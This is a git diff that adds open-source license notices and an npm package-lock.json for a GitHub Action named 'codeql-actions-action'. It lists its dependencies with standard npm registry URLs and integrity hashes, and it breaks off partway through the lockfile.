+ + +@actions/io +MIT +The MIT License (MIT) + +Copyright 2019 GitHub + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +@actions/tool-cache +MIT +The MIT License (MIT) + +Copyright 2019 GitHub + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +@fastify/busboy +MIT +Copyright Brian White. All rights reserved. + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to +deal in the Software without restriction, including without limitation the +rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +sell copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +IN THE SOFTWARE. + +semver +ISC +The ISC License + +Copyright (c) Isaac Z. Schlueter and Contributors + +Permission to use, copy, modify, and/or distribute this software for any +purpose with or without fee is hereby granted, provided that the above +copyright notice and this permission notice appear in all copies. + +THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS. 
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR +IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + + +tunnel +MIT +The MIT License (MIT) + +Copyright (c) 2012 Koichi Kobayashi + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. 
+ + +undici +MIT +MIT License + +Copyright (c) Matteo Collina and Undici contributors + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + + +uuid +MIT +The MIT License (MIT) + +Copyright (c) 2010-2020 Robert Kieffer and other contributors + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 
+ +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/.github/action/package-lock.json b/.github/action/package-lock.json new file mode 100644 index 00000000000..eef94f4b5cd --- /dev/null +++ b/.github/action/package-lock.json 
@@ -0,0 +1,639 @@ +{ + "name": "codeql-actions-action", + "version": "0.1.0", + "lockfileVersion": 2, + "requires": true, + "packages": { + "": { + "name": "codeql-actions-action", + "version": "0.1.0", + "license": "MIT", + "dependencies": { + "@actions/core": "^1.10.1", + "@actions/exec": "^1.1.1", + "@actions/github": "^5.1.1", + "@actions/tool-cache": "^2.0.1" + }, + "devDependencies": { + "@types/node": "^20.6.0", + "@vercel/ncc": "^0.38.0", + "prettier": "^3.0.3", + "typescript": "^5.2.2" + } + }, + "node_modules/@actions/core": { + "version": "1.10.1", + "resolved": "https://registry.npmjs.org/@actions/core/-/core-1.10.1.tgz", + "integrity": "sha512-3lBR9EDAY+iYIpTnTIXmWcNbX3T2kCkAEQGIQx4NVQ0575nk2k3GRZDTPQG+vVtS2izSLmINlxXf0uLtnrTP+g==", + "dependencies": { + "@actions/http-client": "^2.0.1", + "uuid": "^8.3.2" + } + }, + "node_modules/@actions/exec": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/@actions/exec/-/exec-1.1.1.tgz", + "integrity": "sha512-+sCcHHbVdk93a0XT19ECtO/gIXoxvdsgQLzb2fE2/5sIZmWQuluYyjPQtrtTHdU1YzTZ7bAPN4sITq2xi1679w==", + "dependencies": { + "@actions/io": "^1.0.1" + } + }, + "node_modules/@actions/github": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@actions/github/-/github-5.1.1.tgz", + "integrity": "sha512-Nk59rMDoJaV+mHCOJPXuvB1zIbomlKS0dmSIqPGxd0enAXBnOfn4VWF+CGtRCwXZG9Epa54tZA7VIRlJDS8A6g==", + "dependencies": { + "@actions/http-client": "^2.0.1", + "@octokit/core": "^3.6.0", + "@octokit/plugin-paginate-rest": "^2.17.0", + "@octokit/plugin-rest-endpoint-methods": "^5.13.0" + } + }, + "node_modules/@actions/http-client": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/@actions/http-client/-/http-client-2.2.0.tgz", + "integrity": "sha512-q+epW0trjVUUHboliPb4UF9g2msf+w61b32tAkFEwL/IwP0DQWgbCMM0Hbe3e3WXSKz5VcUXbzJQgy8Hkra/Lg==", + "dependencies": { + "tunnel": "^0.0.6", + "undici": "^5.25.4" + } + }, + "node_modules/@actions/io": { + "version": "1.1.3", + "resolved": 
"https://registry.npmjs.org/@actions/io/-/io-1.1.3.tgz", + "integrity": "sha512-wi9JjgKLYS7U/z8PPbco+PvTb/nRWjeoFlJ1Qer83k/3C5PHQi28hiVdeE2kHXmIL99mQFawx8qt/JPjZilJ8Q==" + }, + "node_modules/@actions/tool-cache": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/@actions/tool-cache/-/tool-cache-2.0.1.tgz", + "integrity": "sha512-iPU+mNwrbA8jodY8eyo/0S/QqCKDajiR8OxWTnSk/SnYg0sj8Hp4QcUEVC1YFpHWXtrfbQrE13Jz4k4HXJQKcA==", + "dependencies": { + "@actions/core": "^1.2.6", + "@actions/exec": "^1.0.0", + "@actions/http-client": "^2.0.1", + "@actions/io": "^1.1.1", + "semver": "^6.1.0", + "uuid": "^3.3.2" + } + }, + "node_modules/@actions/tool-cache/node_modules/uuid": { + "version": "3.4.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", + "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", + "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. 
See https://v8.dev/blog/math-random for details.", + "bin": { + "uuid": "bin/uuid" + } + }, + "node_modules/@fastify/busboy": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-2.1.0.tgz", + "integrity": "sha512-+KpH+QxZU7O4675t3mnkQKcZZg56u+K/Ct2K+N2AZYNVK8kyeo/bI18tI8aPm3tvNNRyTWfj6s5tnGNlcbQRsA==", + "engines": { + "node": ">=14" + } + }, + "node_modules/@octokit/auth-token": { + "version": "2.5.0", + "resolved": "https://registry.npmjs.org/@octokit/auth-token/-/auth-token-2.5.0.tgz", + "integrity": "sha512-r5FVUJCOLl19AxiuZD2VRZ/ORjp/4IN98Of6YJoJOkY75CIBuYfmiNHGrDwXr+aLGG55igl9QrxX3hbiXlLb+g==", + "dependencies": { + "@octokit/types": "^6.0.3" + } + }, + "node_modules/@octokit/core": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/@octokit/core/-/core-3.6.0.tgz", + "integrity": "sha512-7RKRKuA4xTjMhY+eG3jthb3hlZCsOwg3rztWh75Xc+ShDWOfDDATWbeZpAHBNRpm4Tv9WgBMOy1zEJYXG6NJ7Q==", + "dependencies": { + "@octokit/auth-token": "^2.4.4", + "@octokit/graphql": "^4.5.8", + "@octokit/request": "^5.6.3", + "@octokit/request-error": "^2.0.5", + "@octokit/types": "^6.0.3", + "before-after-hook": "^2.2.0", + "universal-user-agent": "^6.0.0" + } + }, + "node_modules/@octokit/endpoint": { + "version": "6.0.12", + "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-6.0.12.tgz", + "integrity": "sha512-lF3puPwkQWGfkMClXb4k/eUT/nZKQfxinRWJrdZaJO85Dqwo/G0yOC434Jr2ojwafWJMYqFGFa5ms4jJUgujdA==", + "dependencies": { + "@octokit/types": "^6.0.3", + "is-plain-object": "^5.0.0", + "universal-user-agent": "^6.0.0" + } + }, + "node_modules/@octokit/graphql": { + "version": "4.8.0", + "resolved": "https://registry.npmjs.org/@octokit/graphql/-/graphql-4.8.0.tgz", + "integrity": "sha512-0gv+qLSBLKF0z8TKaSKTsS39scVKF9dbMxJpj3U0vC7wjNWFuIpL/z76Qe2fiuCbDRcJSavkXsVtMS6/dtQQsg==", + "dependencies": { + "@octokit/request": "^5.6.0", + "@octokit/types": "^6.0.3", + "universal-user-agent": "^6.0.0" + } + }, + 
"node_modules/@octokit/openapi-types": { + "version": "12.11.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-12.11.0.tgz", + "integrity": "sha512-VsXyi8peyRq9PqIz/tpqiL2w3w80OgVMwBHltTml3LmVvXiphgeqmY9mvBw9Wu7e0QWk/fqD37ux8yP5uVekyQ==" + }, + "node_modules/@octokit/plugin-paginate-rest": { + "version": "2.21.3", + "resolved": "https://registry.npmjs.org/@octokit/plugin-paginate-rest/-/plugin-paginate-rest-2.21.3.tgz", + "integrity": "sha512-aCZTEf0y2h3OLbrgKkrfFdjRL6eSOo8komneVQJnYecAxIej7Bafor2xhuDJOIFau4pk0i/P28/XgtbyPF0ZHw==", + "dependencies": { + "@octokit/types": "^6.40.0" + }, + "peerDependencies": { + "@octokit/core": ">=2" + } + }, + "node_modules/@octokit/plugin-rest-endpoint-methods": { + "version": "5.16.2", + "resolved": "https://registry.npmjs.org/@octokit/plugin-rest-endpoint-methods/-/plugin-rest-endpoint-methods-5.16.2.tgz", + "integrity": "sha512-8QFz29Fg5jDuTPXVtey05BLm7OB+M8fnvE64RNegzX7U+5NUXcOcnpTIK0YfSHBg8gYd0oxIq3IZTe9SfPZiRw==", + "dependencies": { + "@octokit/types": "^6.39.0", + "deprecation": "^2.3.1" + }, + "peerDependencies": { + "@octokit/core": ">=3" + } + }, + "node_modules/@octokit/request": { + "version": "5.6.3", + "resolved": "https://registry.npmjs.org/@octokit/request/-/request-5.6.3.tgz", + "integrity": "sha512-bFJl0I1KVc9jYTe9tdGGpAMPy32dLBXXo1dS/YwSCTL/2nd9XeHsY616RE3HPXDVk+a+dBuzyz5YdlXwcDTr2A==", + "dependencies": { + "@octokit/endpoint": "^6.0.1", + "@octokit/request-error": "^2.1.0", + "@octokit/types": "^6.16.1", + "is-plain-object": "^5.0.0", + "node-fetch": "^2.6.7", + "universal-user-agent": "^6.0.0" + } + }, + "node_modules/@octokit/request-error": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-2.1.0.tgz", + "integrity": "sha512-1VIvgXxs9WHSjicsRwq8PlR2LR2x6DwsJAaFgzdi0JfJoGSO8mYI/cHJQ+9FbN21aa+DrgNLnwObmyeSC8Rmpg==", + "dependencies": { + "@octokit/types": "^6.0.3", + "deprecation": "^2.0.0", + "once": "^1.4.0" + } + }, 
+ "node_modules/@octokit/types": { + "version": "6.41.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-6.41.0.tgz", + "integrity": "sha512-eJ2jbzjdijiL3B4PrSQaSjuF2sPEQPVCPzBvTHJD9Nz+9dw2SGH4K4xeQJ77YfTq5bRQ+bD8wT11JbeDPmxmGg==", + "dependencies": { + "@octokit/openapi-types": "^12.11.0" + } + }, + "node_modules/@types/node": { + "version": "20.11.19", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.11.19.tgz", + "integrity": "sha512-7xMnVEcZFu0DikYjWOlRq7NTPETrm7teqUT2WkQjrTIkEgUyyGdWsj/Zg8bEJt5TNklzbPD1X3fqfsHw3SpapQ==", + "dev": true, + "dependencies": { + "undici-types": "~5.26.4" + } + }, + "node_modules/@vercel/ncc": { + "version": "0.38.1", + "resolved": "https://registry.npmjs.org/@vercel/ncc/-/ncc-0.38.1.tgz", + "integrity": "sha512-IBBb+iI2NLu4VQn3Vwldyi2QwaXt5+hTyh58ggAMoCGE6DJmPvwL3KPBWcJl1m9LYPChBLE980Jw+CS4Wokqxw==", + "dev": true, + "bin": { + "ncc": "dist/ncc/cli.js" + } + }, + "node_modules/before-after-hook": { + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/before-after-hook/-/before-after-hook-2.2.3.tgz", + "integrity": "sha512-NzUnlZexiaH/46WDhANlyR2bXRopNg4F/zuSA3OpZnllCUgRaOF2znDioDWrmbNVsuZk6l9pMquQB38cfBZwkQ==" + }, + "node_modules/deprecation": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/deprecation/-/deprecation-2.3.1.tgz", + "integrity": "sha512-xmHIy4F3scKVwMsQ4WnVaS8bHOx0DmVwRywosKhaILI0ywMDWPtBSku2HNxRvF7jtwDRsoEwYQSfbxj8b7RlJQ==" + }, + "node_modules/is-plain-object": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", + "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": 
"sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", + "dependencies": { + "whatwg-url": "^5.0.0" + }, + "engines": { + "node": "4.x || >=6.0.0" + }, + "peerDependencies": { + "encoding": "^0.1.0" + }, + "peerDependenciesMeta": { + "encoding": { + "optional": true + } + } + }, + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "dependencies": { + "wrappy": "1" + } + }, + "node_modules/prettier": { + "version": "3.2.5", + "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.2.5.tgz", + "integrity": "sha512-3/GWa9aOC0YeD7LUfvOG2NiDyhOWRvt1k+rcKhOuYnMY24iiCphgneUfJDyFXd6rZCAnuLBv6UeAULtrhT/F4A==", + "dev": true, + "bin": { + "prettier": "bin/prettier.cjs" + }, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/prettier/prettier?sponsor=1" + } + }, + "node_modules/semver": { + "version": "6.3.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", + "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", + "bin": { + "semver": "bin/semver.js" + } + }, + "node_modules/tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" + }, + "node_modules/tunnel": { + "version": "0.0.6", + "resolved": "https://registry.npmjs.org/tunnel/-/tunnel-0.0.6.tgz", + "integrity": "sha512-1h/Lnq9yajKY2PEbBadPXj3VxsDDu844OnaAo52UVmIzIvwwtBPIuNvkjuzBlTWpfJyUbG3ez0KSBibQkj4ojg==", + "engines": { + "node": ">=0.6.11 <=0.7.0 || >=0.7.3" + } + }, + "node_modules/typescript": { + "version": "5.3.3", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.3.3.tgz", + "integrity": 
"sha512-pXWcraxM0uxAS+tN0AG/BF2TyqmHO014Z070UsJ+pFvYuRSq8KH8DmWpnbXe0pEPDHXZV3FcAbJkijJ5oNEnWw==", + "dev": true, + "bin": { + "tsc": "bin/tsc", + "tsserver": "bin/tsserver" + }, + "engines": { + "node": ">=14.17" + } + }, + "node_modules/undici": { + "version": "5.28.3", + "resolved": "https://registry.npmjs.org/undici/-/undici-5.28.3.tgz", + "integrity": "sha512-3ItfzbrhDlINjaP0duwnNsKpDQk3acHI3gVJ1z4fmwMK31k5G9OVIAMLSIaP6w4FaGkaAkN6zaQO9LUvZ1t7VA==", + "dependencies": { + "@fastify/busboy": "^2.0.0" + }, + "engines": { + "node": ">=14.0" + } + }, + "node_modules/undici-types": { + "version": "5.26.5", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", + "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==", + "dev": true + }, + "node_modules/universal-user-agent": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/universal-user-agent/-/universal-user-agent-6.0.1.tgz", + "integrity": "sha512-yCzhz6FN2wU1NiiQRogkTQszlQSlpWaw8SvVegAc+bDxbzHgh1vX8uIe8OYyMH6DwH+sdTJsgMl36+mSMdRJIQ==" + }, + "node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" + }, + "node_modules/whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "dependencies": { + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" + } + }, + 
"node_modules/wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" + } + }, + "dependencies": { + "@actions/core": { + "version": "1.10.1", + "resolved": "https://registry.npmjs.org/@actions/core/-/core-1.10.1.tgz", + "integrity": "sha512-3lBR9EDAY+iYIpTnTIXmWcNbX3T2kCkAEQGIQx4NVQ0575nk2k3GRZDTPQG+vVtS2izSLmINlxXf0uLtnrTP+g==", + "requires": { + "@actions/http-client": "^2.0.1", + "uuid": "^8.3.2" + } + }, + "@actions/exec": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/@actions/exec/-/exec-1.1.1.tgz", + "integrity": "sha512-+sCcHHbVdk93a0XT19ECtO/gIXoxvdsgQLzb2fE2/5sIZmWQuluYyjPQtrtTHdU1YzTZ7bAPN4sITq2xi1679w==", + "requires": { + "@actions/io": "^1.0.1" + } + }, + "@actions/github": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@actions/github/-/github-5.1.1.tgz", + "integrity": "sha512-Nk59rMDoJaV+mHCOJPXuvB1zIbomlKS0dmSIqPGxd0enAXBnOfn4VWF+CGtRCwXZG9Epa54tZA7VIRlJDS8A6g==", + "requires": { + "@actions/http-client": "^2.0.1", + "@octokit/core": "^3.6.0", + "@octokit/plugin-paginate-rest": "^2.17.0", + "@octokit/plugin-rest-endpoint-methods": "^5.13.0" + } + }, + "@actions/http-client": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/@actions/http-client/-/http-client-2.2.0.tgz", + "integrity": "sha512-q+epW0trjVUUHboliPb4UF9g2msf+w61b32tAkFEwL/IwP0DQWgbCMM0Hbe3e3WXSKz5VcUXbzJQgy8Hkra/Lg==", + "requires": { + "tunnel": "^0.0.6", + "undici": "^5.25.4" + } + }, + "@actions/io": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/@actions/io/-/io-1.1.3.tgz", + "integrity": "sha512-wi9JjgKLYS7U/z8PPbco+PvTb/nRWjeoFlJ1Qer83k/3C5PHQi28hiVdeE2kHXmIL99mQFawx8qt/JPjZilJ8Q==" + }, + "@actions/tool-cache": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/@actions/tool-cache/-/tool-cache-2.0.1.tgz", + "integrity": 
"sha512-iPU+mNwrbA8jodY8eyo/0S/QqCKDajiR8OxWTnSk/SnYg0sj8Hp4QcUEVC1YFpHWXtrfbQrE13Jz4k4HXJQKcA==", + "requires": { + "@actions/core": "^1.2.6", + "@actions/exec": "^1.0.0", + "@actions/http-client": "^2.0.1", + "@actions/io": "^1.1.1", + "semver": "^6.1.0", + "uuid": "^3.3.2" + }, + "dependencies": { + "uuid": { + "version": "3.4.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", + "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" + } + } + }, + "@fastify/busboy": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-2.1.0.tgz", + "integrity": "sha512-+KpH+QxZU7O4675t3mnkQKcZZg56u+K/Ct2K+N2AZYNVK8kyeo/bI18tI8aPm3tvNNRyTWfj6s5tnGNlcbQRsA==" + }, + "@octokit/auth-token": { + "version": "2.5.0", + "resolved": "https://registry.npmjs.org/@octokit/auth-token/-/auth-token-2.5.0.tgz", + "integrity": "sha512-r5FVUJCOLl19AxiuZD2VRZ/ORjp/4IN98Of6YJoJOkY75CIBuYfmiNHGrDwXr+aLGG55igl9QrxX3hbiXlLb+g==", + "requires": { + "@octokit/types": "^6.0.3" + } + }, + "@octokit/core": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/@octokit/core/-/core-3.6.0.tgz", + "integrity": "sha512-7RKRKuA4xTjMhY+eG3jthb3hlZCsOwg3rztWh75Xc+ShDWOfDDATWbeZpAHBNRpm4Tv9WgBMOy1zEJYXG6NJ7Q==", + "requires": { + "@octokit/auth-token": "^2.4.4", + "@octokit/graphql": "^4.5.8", + "@octokit/request": "^5.6.3", + "@octokit/request-error": "^2.0.5", + "@octokit/types": "^6.0.3", + "before-after-hook": "^2.2.0", + "universal-user-agent": "^6.0.0" + } + }, + "@octokit/endpoint": { + "version": "6.0.12", + "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-6.0.12.tgz", + "integrity": "sha512-lF3puPwkQWGfkMClXb4k/eUT/nZKQfxinRWJrdZaJO85Dqwo/G0yOC434Jr2ojwafWJMYqFGFa5ms4jJUgujdA==", + "requires": { + "@octokit/types": "^6.0.3", + "is-plain-object": "^5.0.0", + "universal-user-agent": "^6.0.0" + } + }, + "@octokit/graphql": { + "version": "4.8.0", + "resolved": 
"https://registry.npmjs.org/@octokit/graphql/-/graphql-4.8.0.tgz", + "integrity": "sha512-0gv+qLSBLKF0z8TKaSKTsS39scVKF9dbMxJpj3U0vC7wjNWFuIpL/z76Qe2fiuCbDRcJSavkXsVtMS6/dtQQsg==", + "requires": { + "@octokit/request": "^5.6.0", + "@octokit/types": "^6.0.3", + "universal-user-agent": "^6.0.0" + } + }, + "@octokit/openapi-types": { + "version": "12.11.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-12.11.0.tgz", + "integrity": "sha512-VsXyi8peyRq9PqIz/tpqiL2w3w80OgVMwBHltTml3LmVvXiphgeqmY9mvBw9Wu7e0QWk/fqD37ux8yP5uVekyQ==" + }, + "@octokit/plugin-paginate-rest": { + "version": "2.21.3", + "resolved": "https://registry.npmjs.org/@octokit/plugin-paginate-rest/-/plugin-paginate-rest-2.21.3.tgz", + "integrity": "sha512-aCZTEf0y2h3OLbrgKkrfFdjRL6eSOo8komneVQJnYecAxIej7Bafor2xhuDJOIFau4pk0i/P28/XgtbyPF0ZHw==", + "requires": { + "@octokit/types": "^6.40.0" + } + }, + "@octokit/plugin-rest-endpoint-methods": { + "version": "5.16.2", + "resolved": "https://registry.npmjs.org/@octokit/plugin-rest-endpoint-methods/-/plugin-rest-endpoint-methods-5.16.2.tgz", + "integrity": "sha512-8QFz29Fg5jDuTPXVtey05BLm7OB+M8fnvE64RNegzX7U+5NUXcOcnpTIK0YfSHBg8gYd0oxIq3IZTe9SfPZiRw==", + "requires": { + "@octokit/types": "^6.39.0", + "deprecation": "^2.3.1" + } + }, + "@octokit/request": { + "version": "5.6.3", + "resolved": "https://registry.npmjs.org/@octokit/request/-/request-5.6.3.tgz", + "integrity": 